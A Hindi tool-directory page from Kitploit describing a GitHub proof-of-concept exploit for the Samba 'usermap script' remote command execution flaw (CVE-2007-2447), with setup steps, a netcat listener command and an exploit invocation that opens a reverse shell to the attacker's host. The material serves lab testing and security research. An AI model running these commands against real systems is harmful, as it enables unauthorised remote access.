Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2007-2447 — Samba usermap स्क्रिप्ट रिमोट कमांड निष्पादन (CVE-2007-2447) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, नियंत्रित प्रयोगशाला परीक्षण और सुरक्षा अनुसंधान के लिए रिवर्स शेल क्षमता के साथ। | Kitploit
उपकरण/GitHubGitHub/abdulsaabir/cve-2007-2447
पेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubabdulsaabir/cve-2007-2447

CVE-2007-2447

Samba usermap स्क्रिप्ट रिमोट कमांड निष्पादन (CVE-2007-2447) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, नियंत्रित प्रयोगशाला परीक्षण और सुरक्षा अनुसंधान के लिए रिवर्स शेल क्षमता के साथ।

रिपॉजिटरी देखें
138 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2007-2447

PoC: Samba "usermap script" दूरस्थ कमांड-निष्पादन (ऐतिहासिक CVE). इस रिपॉजिटरी में एक छोटा प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट है जो अनुसंधान और शैक्षिक समीक्षा के लिए है। प्राथमिक स्क्रिप्ट usermap_script_Command_Execution.py है।

संदर्भ लेख: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

उपयोग

रिपॉजिटरी को क्लोन करें और स्क्रिप्ट को एक नियंत्रित प्रयोगशाला में चलाएं। PoC वैकल्पिक रूप से LHOST:LPORT पर एक रिवर्स शेल भेजता है — स्क्रिप्ट चलाने से पहले अपना लिसनर शुरू करें और सुनिश्चित करें कि निर्भरताएँ स्थापित हैं (स्थापना अनुभाग देखें)।

git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>

पैरामीटर

  • RHOST — लक्ष्य IP या होस्टनाम
  • RPORT — लक्ष्य TCP पोर्ट (आमतौर पर 139)
  • LHOST — रिवर्स कनेक्शन के लिए लिसनर IP
  • LPORT — लिसनर पोर्ट

स्थापना

अनुशंसित: स्क्रिप्ट चलाने से पहले एक पृथक Python वर्चुअल वातावरण बनाएं और requirements.txt से निर्भरताएँ स्थापित करें।

python3 -m venv exploit_env
source exploit_env/bin/activate
pip install -r requirements.txt

सुरक्षा और अस्वीकरण

यह कोड केवल वैध सुरक्षा अनुसंधान, शिक्षा और रक्षात्मक परीक्षण के लिए प्रदान किया गया है। इस स्क्रिप्ट को किसी भी ऐसे सिस्टम के विरुद्ध न चलाएं जिसके आप मालिक नहीं हैं या जिसके लिए आपके पास स्पष्ट लिखित अनुमति नहीं है। दुरुपयोग कानूनी परिणामों का कारण बन सकता है; रिपॉजिटरी स्वामी दुरुपयोग के लिए उत्तरदायी नहीं है।

संभावित खतरनाक कोड का विश्लेषण करते समय हमेशा स्थैतिक कोड समीक्षा और नियंत्रित प्रयोगशाला परीक्षण (VM स्नैपशॉट, पृथक नेटवर्क और पैकेट कैप्चर) को प्राथमिकता दें।

यदि आप एक निष्पादन योग्य नहीं, बल्कि एनोटेटेड वॉकथ्रू या requirements.txt चाहते हैं, तो यहाँ एक issue खोलें या इसका अनुरोध करें।

टूल डाउनलोड करें